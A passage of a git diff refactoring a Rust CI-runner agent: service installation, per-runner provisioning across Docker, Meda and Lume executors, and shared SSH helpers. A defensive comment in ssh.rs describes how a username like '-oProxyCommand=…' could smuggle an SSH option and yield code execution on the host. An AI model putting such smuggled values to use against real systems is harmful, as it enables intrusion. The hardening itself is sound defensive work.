-            .args(["unload", &plist_path])
-            .status()
-        {
-            Ok(_) => println!("[OK] Unloaded cirun-agent service"),
-            Err(e) => {
-                eprintln!("[ERROR] Failed to unload service: {}", e);
-                std::process::exit(1);
-            }
-        }
-
-        // Remove the plist file
-        if let Err(e) = std::fs::remove_file(&plist_path) {
-            eprintln!("[ERROR] Failed to remove plist file: {}", e);
-            std::process::exit(1);
-        }
-        println!("[OK] Removed plist file: {}", plist_path);
-
-        println!("\n[OK] Service uninstalled successfully!");
-    } else {
-        eprintln!("Unsupported operating system");
-        std::process::exit(1);
-    }
-}
-
-// Helper function for running scripts on VMs using meda (simpler version without lume client)
-async fn run_script_on_vm_meda(
-    _meda: &MedaClient,
-    vm_name: &str,
-    ip_address: &str,
-    script_content: &str,
-    login: &RunnerLogin,
-    run_detached: bool,
-) -> Result<String, Box<dyn std::error::Error>> {
-    use std::io::Write;
-    use std::time::Instant;
-    use tempfile::NamedTempFile;
-    use tokio::process::Command;
-
-    info!("VM '{}' is ready with IP: {}", vm_name, ip_address);
-
-    // Step 1: Create a temporary file for the script
-    info!("Creating temporary script file");
-    let mut temp_file = NamedTempFile::new()?;
-    temp_file.write_all(script_content.as_bytes())?;
-    let temp_file_path = temp_file
-        .path()
-        .to_str()
-        .ok_or("Failed to get temporary file path")?;
-
-    // Step 2: Resolve SSH private key path
-    let home_dir = std::env::var("HOME").unwrap_or_else(|_| "/root".to_string());
-    let ssh_key_path = format!("{}/.meda/ssh/id_ed25519", home_dir);
-    info!("Using SSH key authentication: {}", ssh_key_path);
-
-    // Step 3: Setup SSH options
-    let ssh_options = vec![
-        "-o",
-        "StrictHostKeyChecking=no",
-        "-o",
-        "UserKnownHostsFile=/dev/null",
-        "-o",
-        "ConnectTimeout=10",
-    ];
-
-    // Step 4: Test SSH connection with retries (SSH may not be ready immediately after VM boot)
-    info!("Waiting for SSH to be ready on VM (max 30 seconds)...");
-    let max_ssh_retries = 6; // 6 retries * 5 seconds = 30 seconds max
-    let mut ssh_ready = false;
-
-    for attempt in 1..=max_ssh_retries {
-        let output = match tokio::time::timeout(
-            tokio::time::Duration::from_secs(30),
-            Command::new("ssh")
-                .arg("-i")
-                .arg(&ssh_key_path)
-                .args(&ssh_options)
-                .arg(format!("{}@{}", login.username, ip_address))
-                .arg("echo 'SSH connection test successful'")
-                .stdout(std::process::Stdio::piped())
-                .stderr(std::process::Stdio::piped())
-                .output(),
-        )
-        .await
-        {
-            Ok(result) => result?,
-            Err(_) => {
-                warn!(
-                    "SSH connection test timed out after 30s (attempt {}/{})",
-                    attempt, max_ssh_retries
-                );
-                if attempt < max_ssh_retries {
-                    tokio::time::sleep(tokio::time::Duration::from_secs(5)).await;
-                }
-                continue;
-            }
-        };
-
-        if output.status.success() {
-            info!(
-                "✔ SSH connection successful (attempt {}/{})",
-                attempt, max_ssh_retries
-            );
-            ssh_ready = true;
-            break;
-        } else {
-            let error_msg = String::from_utf8_lossy(&output.stderr);
-            info!(
-                "SSH not ready yet (attempt {}/{}): {}",
-                attempt,
-                max_ssh_retries,
-                error_msg.trim()
-            );
-            if attempt < max_ssh_retries {
-                tokio::time::sleep(tokio::time::Duration::from_secs(5)).await;
-            }
-        }
-    }
-
-    if !ssh_ready {
-        return Err(
-            "SSH connection failed after multiple retries - VM may not be fully booted".into(),
-        );
-    }
-
-    // Step 5: Copy the script to the VM
-    let remote_script_path = format!("/tmp/script_{}.sh", Instant::now().elapsed().as_secs());
-    info!("Copying script to VM at {}", remote_script_path);
-
-    let output = tokio::time::timeout(
-        tokio::time::Duration::from_secs(60),
-        Command::new("scp")
-            .arg("-i")
-            .arg(&ssh_key_path)
-            .args(&ssh_options)
-            .arg(temp_file_path)
-            .arg(format!(
-                "{}@{}:{}",
-                login.username, ip_address, remote_script_path
-            ))
-            .stdout(std::process::Stdio::piped())
-            .stderr(std::process::Stdio::piped())
-            .output(),
-    )
-    .await
-    .map_err(|_| "SCP transfer timed out after 60s")??;
-
-    if !output.status.success() {
-        let error_msg = String::from_utf8_lossy(&output.stderr);
-        return Err(format!("SCP failed: {}", error_msg).into());
-    }
-
-    info!("✔ SCP transfer successful");
-
-    // Step 6: Execute the script on the VM with sudo (provision scripts need root privileges)
-    // Detached mode gets a short timeout (just needs to launch); blocking mode gets longer.
-    let (script_timeout_secs, script_future) = if run_detached {
-        info!("Executing script on VM in detached mode with sudo");
-        (
-            60u64,
-            Command::new("ssh")
-                .arg("-i")
-                .arg(&ssh_key_path)
-                .args(&ssh_options)
-                .arg(format!("{}@{}", login.username, ip_address))
-                .arg(format!(
-                    "chmod +x {} && sudo nohup bash {} > /tmp/script_stdout.log 2> /tmp/script_stderr.log & echo $!",
-                    remote_script_path, remote_script_path
-                ))
-                .stdout(std::process::Stdio::piped())
-                .stderr(std::process::Stdio::piped())
-                .output(),
-        )
-    } else {
-        info!("Executing script on VM and waiting for completion with sudo");
-        (
-            600u64,
-            Command::new("ssh")
-                .arg("-i")
-                .arg(&ssh_key_path)
-                .args(&ssh_options)
-                .arg(format!("{}@{}", login.username, ip_address))
-                .arg(format!(
-                    "chmod +x {} && sudo bash {}",
-                    remote_script_path, remote_script_path
-                ))
-                .stdout(std::process::Stdio::piped())
-                .stderr(std::process::Stdio::piped())
-                .output(),
-        )
-    };
-
-    let output = tokio::time::timeout(
-        tokio::time::Duration::from_secs(script_timeout_secs),
-        script_future,
-    )
-    .await
-    .map_err(|_| format!("Script execution timed out after {}s", script_timeout_secs))??;
-
-    if !output.status.success() {
-        let error_msg = String::from_utf8_lossy(&output.stderr);
-        return Err(format!("Script execution failed: {}", error_msg).into());
-    }
-
-    let script_output = String::from_utf8_lossy(&output.stdout).to_string();
-    info!("Script execution completed successfully.");
-    Ok(script_output)
-}
+use bootstrap::{check_sshpass_installed, get_agent_info};
 
 #[tokio::main]
 async fn main() {
     println!("{}", CIRUN_BANNER);
     let args = Args::parse();
 
+    // Handle docker GPU smoke test and exit (no other flags required).
+    if args.docker_smoke_test {
+        env::set_var("RUST_LOG", "info");
+        env_logger::init();
+        let client = crate::docker::client::DockerClient::new();
+        match client.ping() {
+            Ok(v) => info!("docker daemon ok, server={}", v),
+            Err(e) => {
+                error!("docker daemon not reachable: {}", e);
+                std::process::exit(2);
+            }
+        }
+        match client.smoke_test_gpu(&args.docker_smoke_image) {
+            Ok(out) => {
+                println!("{}", out);
+                info!("docker GPU smoke test passed");
+                return;
+            }
+            Err(e) => {
+                error!("docker GPU smoke test failed: {}", e);
+                std::process::exit(3);
+            }
+        }
+    }
+
     // Handle install service flag
     if args.install_service {
-        install_service(&args);
+        service::install(&args);
         return;
     }
 
     // Handle uninstall service flag
     if args.uninstall_service {
-        uninstall_service();
+        service::uninstall();
         return;
     }
 
@@ -1545,10 +145,12 @@ async fn main() {
     let version = env!("CARGO_PKG_VERSION");
     info!("Cirun Agent version: {}", version);
 
-    // Check if sshpass is installed (only required on macOS)
+    // sshpass is only required for the lume executor's SSH provisioning path.
+    // Warn if missing on macOS but do not exit — docker dispatch (Docker Desktop)
+    // works without it, and lume's `run_post_spawn` will surface a clean error
+    // at provision time if needed.
     if cfg!(target_os = "macos") && !check_sshpass_installed() {
-        error!("Exiting: sshpass is required for VM provisioning on macOS");
-        std::process::exit(1);
+        warn!("sshpass not installed — lume executor will fail; docker executor is unaffected");
     }
 
     // Get or generate a persistent agent information
@@ -1567,20 +169,22 @@ async fn main() {
     info!("Hostname: {}", agent_info.hostname);
     info!("OS: {} ({})", agent_info.os, agent_info.arch);
 
-    let default_api_url = "https://api.cirun.io/api/v1";
-    let cirun_api_url = env::var("CIRUN_API_URL").unwrap_or_else(|_| default_api_url.to_string());
+    let cirun_api_url = match config::resolve_api_url() {
+        Ok(u) => u,
+        Err(e) => {
+            error!("{e}");
+            std::process::exit(1);
+        }
+    };
     info!("Cirun API URL: {}", cirun_api_url);
 
     // Determine effective max_vms:
     // - If explicitly provided, use that value
     // - On macOS: default to 2 (Apple Virtualization Framework limit)
     // - On Linux: no limit (None)
-    let max_vms = args.max_vms.or_else(|| {
-        if use_meda() {
-            None // No default limit on Linux
-        } else {
-            Some(MACOS_DEFAULT_MAX_VMS)
-        }
+    let max_vms = args.max_vms.or(match env::consts::OS {
+        "macos" => Some(MACOS_DEFAULT_MAX_VMS),
+        _ => None, // No default limit on Linux
     });
     match max_vms {
         Some(limit) => info!("Max concurrent VMs: {}", limit),
@@ -1595,61 +199,26 @@ async fn main() {
 
     // Set up log cleanup parameters based on platform
     let home_dir = std::env::var("HOME").unwrap_or_else(|_| ".".to_string());
-    let log_dir: PathBuf;
+    let log_dir: PathBuf = match env::consts::OS {
+        "macos" => PathBuf::from(&home_dir).join(".lume/logs"),
+        _ => PathBuf::from(&home_dir).join(".meda/logs"),
+    };
 
-    // Download and run the appropriate VM manager based on platform
-    if use_meda() {
-        info!("Detected Linux platform - using Meda for VM management");
+    // Bring up backend daemons that need pre-start (meda + lume; docker uses
+    // the host's docker daemon directly). Selection per-runner happens via
+    // payload; this is just startup-time setup.
+    #[cfg(target_os = "linux")]
+    {
         meda::setup::download_and_run_meda().await;
-        log_dir = PathBuf::from(&home_dir).join(".meda/logs");
-
-        info!("Checking Meda connectivity...");
-        match MedaClient::new() {
-            Ok(meda) => match meda.list_vms().await {
-                Ok(vms) => {
-                    info!("✅ Successfully connected to Meda. Found {} VMs", vms.len());
-                    for vm in vms {
-                        info!("- {} ({})", vm.name, vm.state);
-                    }
-                }
-                Err(e) => {
-                    error!("❌ Failed to connect to Meda API: {:?}", e);
-                    error!("Agent will continue but VM operations will likely fail");
-                }
-            },
-            Err(e) => {
-                error!("❌ Failed to initialize Meda client: {:?}", e);
-                error!("Agent will continue but VM operations will likely fail");
-            }
-        }
-    } else {
-        info!("Detected macOS platform - using Lume for VM management");
-        lume::download_and_run_lume().await;
-        log_dir = PathBuf::from(&home_dir).join(".lume/logs");
-
-        info!("Checking Lume connectivity...");
-        match LumeClient::new() {
-            Ok(lume) => match lume.list_vms().await {
-                Ok(vms) => {
-                    info!("✅ Successfully connected to Lume. Found {} VMs", vms.len());
-                    for vm in vms {
-                        info!(
-                            "- {} ({}, {}, CPU: {}, Memory: {}, Disk: {})",
-                            vm.name, vm.state, vm.os, vm.cpu, vm.memory, vm.disk_size.total
-                        );
-                    }
-                }
-                Err(e) => {
-                    error!("❌ Failed to connect to Lume API: {:?}", e);
-                    error!("Agent will continue but VM operations will likely fail");
-                }
-            },
-            Err(e) => {
-                error!("❌ Failed to initialize Lume client: {:?}", e);
-                error!("Agent will continue but VM operations will likely fail");
-            }
-        }
     }
+    #[cfg(target_os = "macos")]
+    {
+        lume::download_and_run_lume().await;
+    }
+
+    // Seed the runner→executor map from live state. Prevents silent mis-routing
+    // of deletes after an agent restart with runners already on the host.
+    client.seed_runner_executors_from_registry().await;
 
     let mut last_cleanup = SystemTime::now();
     let cleanup_interval = Duration::from_secs(24 * 60 * 60); // Daily log cleanup
@@ -1668,6 +237,14 @@ async fn main() {
             match result {
                 Ok(pr) => {
                     in_flight.remove(&pr.runner_name);
+                    if let Ok(mut s) = client.in_flight.lock() {
+                        s.remove(&pr.runner_name);
+                    }
+                    if let Some(kind) = pr.executor_kind {
+                        if let Ok(mut map) = client.runner_executors.lock() {
+                            map.insert(pr.runner_name.clone(), kind);
+                        }
+                    }
                     match pr.outcome {
                         Ok(()) => {
                             client.clear_retry(&pr.runner_name);
@@ -1714,10 +291,19 @@ async fn main() {
         // Check if it's time to clean up logs
         if let Ok(duration) = SystemTime::now().duration_since(last_cleanup) {
             if duration >= cleanup_interval {
-                let cleanup_result = if use_meda() {
-                    cleanup_meda_logs(&log_dir, 7, 100)
-                } else {
-                    cleanup_lume_logs(&log_dir, 7, 100)
+                let cleanup_result: Result<(), Box<dyn std::error::Error>> = {
+                    #[cfg(target_os = "macos")]
+                    {
+                        cleanup_lume_logs(&log_dir, 7, 100)
+                    }
+                    #[cfg(target_os = "linux")]
+                    {
+                        cleanup_meda_logs(&log_dir, 7, 100)
+                    }
+                    #[cfg(not(any(target_os = "macos", target_os = "linux")))]
+                    {
+                        Ok(())
+                    }
                 };
 
                 match cleanup_result {
@@ -1738,9 +324,15 @@ async fn main() {
 #[cfg(test)]
 mod tests {
     use super::*;
+    use crate::bootstrap::{get_agent_info, get_hostname};
+    // generate_template_name lives in crate::lume which is macos-only.
+    // The tests that rely on it are gated below.
+    #[cfg(target_os = "macos")]
+    use crate::lume::generate_template_name;
     use std::collections::hash_map::DefaultHasher;
     use std::hash::{Hash, Hasher};
 
+    #[cfg(target_os = "macos")]
     #[test]
     fn test_template_name_generation() {
         let config1 = TemplateConfig {

--- a/src/meda/client.rs
+++ b/src/meda/client.rs
@@ -95,34 +95,6 @@ impl MedaClient {
     }
 
     /// Start an existing VM
-    pub async fn start_vm(&self, name: &str) -> Result<(), MedaError> {
-        let url = format!("{}/vms/{}/start", self.base_url, name);
-
-        info!("Starting VM: {}", name);
-
-        let response = self.client.post(&url).send().await?;
-        let status = response.status();
-        let response_text = response
-            .text()
-            .await
-            .unwrap_or_else(|_| "Failed to read response body".to_string());
-
-        info!(
-            "VM Start API Response: Status = {}, Body = {}",
-            status, response_text
-        );
-
-        if !status.is_success() {
-            return Err(MedaError::ApiError(format!(
-                "Failed to start VM: {}",
-                response_text
-            )));
-        }
-
-        info!("Successfully started VM: {}", name);
-        Ok(())
-    }
-
     /// Stop a running VM
     #[allow(dead_code)]
     pub async fn stop_vm(&self, name: &str) -> Result<(), MedaError> {

--- a/src/meda/mod.rs
+++ b/src/meda/mod.rs
@@ -5,4 +5,3 @@ pub mod models;
 pub mod setup;
 
 // Re-export setup functions for easier access
-pub use self::setup::*;

--- a/src/meda/setup.rs
+++ b/src/meda/setup.rs
@@ -7,7 +7,10 @@ use std::{thread, time::Duration, time::SystemTime};
 use chrono::{DateTime, Utc};
 use std::path::Path;
 
-/// Check if meda serve process is currently running
+/// Check if meda serve process is currently running.
+/// Only callable on Linux (meda is a linux-only KVM helper); other platforms
+/// build it but never invoke it.
+#[allow(dead_code)]
 pub fn is_meda_running() -> bool {
     Command::new("pgrep")
         .arg("-f")
@@ -18,6 +21,7 @@ pub fn is_meda_running() -> bool {
         .unwrap_or(false)
 }
 
+#[allow(dead_code)]
 pub async fn download_and_run_meda() {
     // Spawn a blocking task to handle the file operations
     let result = tokio::task::spawn_blocking(download_and_run_meda_internal).await;
@@ -124,6 +128,7 @@ pub fn cleanup_log_files(
     Ok(())
 }
 
+#[allow(dead_code)]
 fn download_and_run_meda_internal() -> Result<(), Box<dyn std::error::Error + Send + Sync>> {
     let install_dir = PathBuf::from(format!("{}/.meda", std::env::var("HOME")?));
     let meda_bin_path = install_dir.join("meda");

--- a/src/provision.rs
+++ b/src/provision.rs
@@ -1,0 +1,247 @@
+//! Single-runner provisioning task. Spawned per runner from the main loop.
+//! Resolves the executor + GPU spec from the payload, dispatches through
+//! the host registry, and reports outcome via `ProvisionResult`.
+
+use crate::api::{RunnerResources, RunnerToProvision};
+// Lume template helpers + the TemplateConfig they consume live behind
+// macos-only modules. Linux builds never hit the lume branch in template
+// resolution (the executor is always Docker or Meda there), so both the
+// type and the helpers are macos-gated.
+#[cfg(target_os = "macos")]
+use crate::api::TemplateConfig;
+#[cfg(target_os = "macos")]
+use crate::lume::{
+    check_template_exists, create_template, find_matching_template, generate_template_name,
+};
+use log::{error, info};
+use std::sync::Arc;
+use tokio::sync::Semaphore;
+
+/// Result of a single runner provisioning attempt
+pub struct ProvisionResult {
+    pub runner_name: String,
+    /// Executor that handled the runner. `None` when derivation failed
+    /// (we never started provisioning).
+    pub executor_kind: Option<crate::executor::ExecutorKind>,
+    pub outcome: Result<(), String>,
+}
+
+/// Provision a single runner in its own task. Acquires a semaphore permit to
+/// enforce concurrency bounds. Dispatches via the host `Registry` (which was
+/// probed at startup) so a backend whose daemon wasn't reachable never gets a
+/// late provision attempt against a fresh client.
+pub async fn provision_single_runner(
+    runner: RunnerToProvision,
+    semaphore: Arc<Semaphore>,
+    registry: Arc<crate::executor::registry::Registry>,
+) -> ProvisionResult {
+    let _permit = semaphore.acquire().await.expect("semaphore closed");
+
+    info!(
+        "Processing runner: {} (image: {}, os: {}, cpu: {}, mem: {}GB, disk: {}GB)",
+        runner.name, runner.image, runner.os, runner.cpu, runner.memory, runner.disk
+    );
+
+    // The image-registry split + TemplateConfig only feed the lume
+    // template-matching path; on linux that path is cfg'd out so the
+    // whole prep block is macos-gated to avoid unused-binding warnings
+    // under `-D warnings`.
+    #[cfg(target_os = "macos")]
+    let template_config = {
+        // Parse image registry hostname from image name
+        // (e.g. ghcr.io/foo/bar → "ghcr.io").
+        let (image_registry, image) = if runner.image.contains('.')
+            && runner.image.split('/').next().unwrap().contains('.')
+        {
+            let parts: Vec<&str> = runner.image.splitn(2, '/').collect();
+            if parts.len() == 2 {
+                (Some(parts[0].to_string()), parts[1].to_string())
+            } else {
+                (Some("ghcr.io".to_string()), runner.image.clone())
+            }
+        } else {
+            (Some("ghcr.io".to_string()), runner.image.clone())
+        };
+        TemplateConfig {
+            image,
+            registry: image_registry,
+            organization: None,
+            cpu: runner.cpu,
+            memory: runner.memory,
+            disk: runner.disk,
+            os: runner.os.clone(),
+        }
+    };
+
+    // Resolve executor: prefer the SaaS-set top-level `executor` field, fall
+    // back to `extra_config.executor` (or legacy `container: true`), then OS
+    // default. No env-var dispatch.
+    let executor_kind = match crate::executor::resolve_executor_kind(
+        runner.executor.as_deref(),
+        runner.extra_config.as_ref(),
+        &runner.os,
+    ) {
+        Ok(k) => k,
+        Err(e) => {
+            return ProvisionResult {
+                runner_name: runner.name.clone(),
+                executor_kind: None,
+                outcome: Err(format!("Cannot derive executor: {e}")),
+            };
+        }
+    };
+
+    // Resolve template: docker + meda use image directly, lume uses
+    // template matching. The lume branch only compiles on macos because
+    // the helper module is cfg-gated; on linux the executor is always
+    // Docker or Meda, so the `else` branch is unreachable there.
+    let template_name = if matches!(
+        executor_kind,
+        crate::executor::ExecutorKind::Docker | crate::executor::ExecutorKind::Meda
+    ) {
+        info!(
+            "Using {:?} executor - using image name directly: {}",
+            executor_kind, runner.image
+        );
+        Some(runner.image.clone())
+    } else {
+        #[cfg(target_os = "macos")]
+        {
+            if let Some(existing_template) = find_matching_template(&template_config).await {
+                info!(
+                    "Found existing template with matching configuration: {}",
+                    existing_template
+                );
+                Some(existing_template)
+            } else {
+                let generated_name = generate_template_name(&template_config);
+                let template_exists = check_template_exists(&generated_name).await;
+
+                if !template_exists {
+                    info!(
+                        "No matching template found. Creating new template '{}' from image '{}'",
+                        generated_name, template_config.image
+                    );
+                    match create_template(&template_config, &generated_name).await {
+                        Ok(_) => {
+                            info!("Successfully created template: {}", generated_name);
+                            Some(generated_name)
+                        }
+                        Err(e) => {
+                            error!("Failed to create template {}: {}", generated_name, e);
+                            return ProvisionResult {
+                                runner_name: runner.name.clone(),
+                                executor_kind: Some(executor_kind),
+                                outcome: Err(format!("Template creation failed: {}", e)),
+                            };
+                        }
+                    }
+                } else {
+                    info!("Using existing template: {}", generated_name);
+                    Some(generated_name)
+                }
+            }
+        }
+        #[cfg(not(target_os = "macos"))]
+        {
+            // Lume executor is macos-only, but the OS filter in
+            // cirun_client should have already dropped this dispatch.
+            // Fall through with None → ProvisionResult with the
+            // standard "no template" error path below.
+            None
+        }
+    };
+
+    let template_name = match template_name {
+        Some(t) => t,
+        None => {
+            return ProvisionResult {
+                runner_name: runner.name.clone(),
+                executor_kind: Some(executor_kind),
+                outcome: Err("No template available".to_string()),
+            };
+        }
+    };
+
+    info!(
+        "Provisioning runner '{}' with template '{}'",
+        runner.name, template_name
+    );
+
+    let resources = RunnerResources {
+        cpu: runner.cpu,
+        memory: runner.memory,
+        disk: runner.disk,
+    };
+
+    // Parse gpu request: prefer top-level `gpu` (SaaS contract), fall back to
+    // `extra_config.gpu` (legacy).
+    let gpu_raw = runner
+        .gpu
+        .as_ref()
+        .map(|s| serde_json::Value::String(s.clone()))
+        .or_else(|| {
+            runner
+                .extra_config
+                .as_ref()
+                .and_then(|c| c.get("gpu").cloned())
+        });
+    let gpu = match crate::executor::parse_gpu_request(gpu_raw.as_ref()) {
+        Ok(g) => g,
+        Err(e) => {
+            return ProvisionResult {
+                runner_name: runner.name.clone(),
+                executor_kind: Some(executor_kind),
+                outcome: Err(format!("Invalid gpu request: {e}")),
+            };
+        }
+    };
+
+    let spec = crate::executor::RunnerSpec {
+        name: runner.name.clone(),
+        provision_script: runner.provision_script.clone(),
+        image: template_name.clone(),
+        cpu: resources.cpu,
+        memory_gb: resources.memory,
+        disk_gb: resources.disk,
+        gpu,
+        login: crate::executor::RunnerLogin {
+            username: runner.login.username.clone(),
+            password: runner.login.password.clone(),
+        },
+    };
+
+    // Dispatch through the host registry (probed at startup) so a backend
+    // that wasn't reachable then doesn't get a late attempt against a fresh
+    // client.
+    let result: Result<(), String> = match registry.get(executor_kind) {
+        Ok(exec) => exec.provision(&spec).await.map_err(|e| e.to_string()),
+        Err(e) => Err(e.to_string()),
+    };
+
+    match result {
+        Ok(()) => {
+            info!(
+                "Successfully provisioned runner: {} using template {}",
+                runner.name, template_name
+            );
+            ProvisionResult {
+                runner_name: runner.name.clone(),
+                executor_kind: Some(executor_kind),
+                outcome: Ok(()),
+            }
+        }
+        Err(e) => {
+            let error_msg = e.to_string();
+            error!(
+                "Failed to provision runner {} using template {}: {}",
+                runner.name, template_name, error_msg
+            );
+            ProvisionResult {
+                runner_name: runner.name.clone(),
+                executor_kind: Some(executor_kind),
+                outcome: Err(error_msg),
+            }
+        }
+    }
+}

--- a/src/service.rs
+++ b/src/service.rs
@@ -1,0 +1,231 @@
+//! Install / uninstall the agent as a system service.
+//! Linux: systemd unit. macOS: launchd plist.
+
+use crate::Args;
+
+pub fn install(args: &Args) {
+    use std::fs;
+
+    println!("Installing cirun-agent as a system service...");
+
+    let exe_path = std::env::current_exe().expect("Failed to get current executable path");
+    let exe_path_str = exe_path.to_str().expect("Failed to convert path to string");
+
+    let api_token = args
+        .api_token
+        .as_ref()
+        .expect("API token is required for service installation");
+    let mut cmd = format!("{} --api-token {}", exe_path_str, api_token);
+    if args.interval != 5 {
+        cmd.push_str(&format!(" --interval {}", args.interval));
+    }
+    if args.verbose {
+        cmd.push_str(" --verbose");
+    }
+
+    if cfg!(target_os = "linux") {
+        let service_path = "/etc/systemd/system/cirun-agent.service";
+        if std::path::Path::new(service_path).exists() {
+            println!("Found existing cirun-agent service, stopping it...");
+            let _ = std::process::Command::new("systemctl")
+                .args(["stop", "cirun-agent"])
+                .status();
+            let _ = std::process::Command::new("systemctl")
+                .args(["disable", "cirun-agent"])
+                .status();
+        }
+
+        let home_dir = std::env::var("HOME").unwrap_or_else(|_| "/root".to_string());
+        let service_content = format!(
+            r#"[Unit]
+Description=Cirun Agent for On-Prem Runner Management
+After=network.target
+
+[Service]
+Type=simple
+ExecStart={}
+Environment="HOME={}"
+Restart=always
+RestartSec=10
+StandardOutput=journal
+StandardError=journal
+
+[Install]
+WantedBy=multi-user.target
+"#,
+            cmd, home_dir
+        );
+
+        fs::write(service_path, service_content).expect("Failed to write systemd service file");
+        println!("[OK] Created systemd service file at {}", service_path);
+
+        std::process::Command::new("systemctl")
+            .args(["daemon-reload"])
+            .status()
+            .expect("Failed to reload systemd");
+        println!("[OK] Reloaded systemd");
+
+        std::process::Command::new("systemctl")
+            .args(["enable", "cirun-agent"])
+            .status()
+            .expect("Failed to enable cirun-agent service");
+        println!("[OK] Enabled cirun-agent to start on boot");
+
+        std::process::Command::new("systemctl")
+            .args(["start", "cirun-agent"])
+            .status()
+            .expect("Failed to start cirun-agent service");
+        println!("[OK] Started cirun-agent service");
+
+        println!("\nService installed successfully!");
+        println!("View logs: journalctl -u cirun-agent -f");
+        println!("Stop service: sudo systemctl stop cirun-agent");
+        println!("Restart service: sudo systemctl restart cirun-agent");
+    } else if cfg!(target_os = "macos") {
+        let home_dir = std::env::var("HOME").expect("Failed to get HOME directory");
+        let plist_dir = format!("{}/Library/LaunchAgents", home_dir);
+        let plist_path = format!("{}/io.cirun.agent.plist", plist_dir);
+
+        if std::path::Path::new(&plist_path).exists() {
+            println!("Found existing cirun-agent service, unloading it...");
+            let _ = std::process::Command::new("launchctl")
+                .args(["unload", &plist_path])
+                .status();
+        }
+
+        fs::create_dir_all(&plist_dir).expect("Failed to create LaunchAgents directory");
+
+        let plist_content = format!(
+            r#"<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+    <key>Label</key>
+    <string>io.cirun.agent</string>
+    <key>ProgramArguments</key>
+    <array>
+        <string>{}</string>
+        <string>--api-token</string>
+        <string>{}</string>
+        <string>--interval</string>
+        <string>{}</string>
+{}    </array>
+    <key>EnvironmentVariables</key>
+    <dict>
+        <key>PATH</key>
+        <string>/opt/homebrew/bin:/usr/local/bin:/usr/bin:/bin:/usr/sbin:/sbin</string>
+    </dict>
+    <key>RunAtLoad</key>
+    <true/>
+    <key>KeepAlive</key>
+    <true/>
+    <key>StandardOutPath</key>
+    <string>{}/Library/Logs/cirun-agent.log</string>
+    <key>StandardErrorPath</key>
+    <string>{}/Library/Logs/cirun-agent.error.log</string>
+</dict>
+</plist>
+"#,
+            exe_path_str,
+            api_token,
+            args.interval,
+            if args.verbose {
+                "        <string>--verbose</string>\n"
+            } else {
+                ""
+            },
+            home_dir,
+            home_dir
+        );
+
+        fs::write(&plist_path, plist_content).expect("Failed to write launchd plist");
+        println!("[OK] Created launchd plist at {}", plist_path);
+
+        std::process::Command::new("launchctl")
+            .args(["load", &plist_path])
+            .status()
+            .expect("Failed to load launchd service");
+        println!("[OK] Loaded cirun-agent service");
+
+        println!("\nService installed successfully!");
+        println!("View logs: tail -f ~/Library/Logs/cirun-agent.log");
+        println!("Stop service: launchctl unload {}", plist_path);
+        println!(
+            "Restart service: launchctl unload {} && launchctl load {}",
+            plist_path, plist_path
+        );
+    } else {
+        eprintln!("Unsupported operating system");
+        std::process::exit(1);
+    }
+}
+
+pub fn uninstall() {
+    println!("Uninstalling cirun-agent system service...");
+
+    if cfg!(target_os = "linux") {
+        let service_path = "/etc/systemd/system/cirun-agent.service";
+
+        if !std::path::Path::new(service_path).exists() {
+            println!("[ERROR] Service is not installed");
+            std::process::exit(1);
+        }
+
+        println!("Stopping cirun-agent service...");
+        let _ = std::process::Command::new("systemctl")
+            .args(["stop", "cirun-agent"])
+            .status();
+        println!("[OK] Stopped cirun-agent service");
+
+        println!("Disabling cirun-agent service...");
+        let _ = std::process::Command::new("systemctl")
+            .args(["disable", "cirun-agent"])
+            .status();
+        println!("[OK] Disabled cirun-agent service");
+
+        if let Err(e) = std::fs::remove_file(service_path) {
+            eprintln!("[ERROR] Failed to remove service file: {}", e);
+            std::process::exit(1);
+        }
+        println!("[OK] Removed service file: {}", service_path);
+
+        std::process::Command::new("systemctl")
+            .args(["daemon-reload"])
+            .status()
+            .expect("Failed to reload systemd");
+        println!("[OK] Reloaded systemd");
+
+        println!("\n[OK] Service uninstalled successfully!");
+    } else if cfg!(target_os = "macos") {
+        let home_dir = std::env::var("HOME").expect("Failed to get HOME directory");
+        let plist_path = format!("{}/Library/LaunchAgents/io.cirun.agent.plist", home_dir);
+
+        if !std::path::Path::new(&plist_path).exists() {
+            println!("[ERROR] Service is not installed");
+            std::process::exit(1);
+        }
+
+        println!("Unloading cirun-agent service...");
+        match std::process::Command::new("launchctl")
+            .args(["unload", &plist_path])
+            .status()
+        {
+            Ok(_) => println!("[OK] Unloaded cirun-agent service"),
+            Err(e) => {
+                eprintln!("[ERROR] Failed to unload service: {}", e);
+                std::process::exit(1);
+            }
+        }
+
+        if let Err(e) = std::fs::remove_file(&plist_path) {
+            eprintln!("[ERROR] Failed to remove plist file: {}", e);
+            std::process::exit(1);
+        }
+        println!("[OK] Removed plist file: {}", plist_path);
+
+        println!("\n[OK] Service uninstalled successfully!");
+    } else {
+        eprintln!("Unsupported operating system");
+        std::process::exit(1);
+    }
+}

--- a/src/ssh.rs
+++ b/src/ssh.rs
@@ -1,0 +1,293 @@
+//! Shared SSH primitives used by the meda + lume provisioning paths.
+//! Builds the right `ssh`/`scp` invocation for key-based or password-based auth.
+//!
+//! Hardening: `SshTarget::new` validates `user` and `host` against a strict
+//! identifier regex so payload-controlled values (e.g. `login.username` from
+//! the cirun api) cannot be smuggled past argv parsing. OpenSSH treats any
+//! argv element starting with `-` as an option regardless of an embedded `@`,
+//! so a username like `-oProxyCommand=…` would otherwise yield RCE on the
+//! agent host. Validation + a literal `--` argv separator before the
+//! destination is defence-in-depth: either alone is sufficient, both together
+//! make the failure mode obvious to anyone touching this file.
+
+use anyhow::{anyhow, Result};
+use log::info;
+use std::path::{Path, PathBuf};
+use std::process::Stdio;
+use std::time::Duration;
+use tokio::process::Command;
+
+// Each variant is exclusively used by a single per-OS executor path:
+// `Key` by meda (linux), `PasswordFile` by lume (macos). On either host
+// the unused variant is dead — that's by design, not a bug — so the
+// allow keeps `-D warnings` happy on both targets without breaking the
+// pattern-match exhaustiveness of the rest of the module.
+#[allow(dead_code)]
+#[derive(Debug, Clone)]
+pub enum SshAuth {
+    /// `ssh -i <path>` — used by meda (cloud-init seeds an ed25519 key).
+    Key(PathBuf),
+    /// `sshpass -f <path>` — used by lume (cloned macOS VM authenticates with the template user's password).
+    PasswordFile(PathBuf),
+}
+
+pub struct SshTarget {
+    host: String,
+    user: String,
+    auth: SshAuth,
+}
+
+/// Accept identifiers a sane Unix username or hostname/IP could plausibly use.
+/// Rejects anything starting with `-` (option smuggling) plus shell metachars,
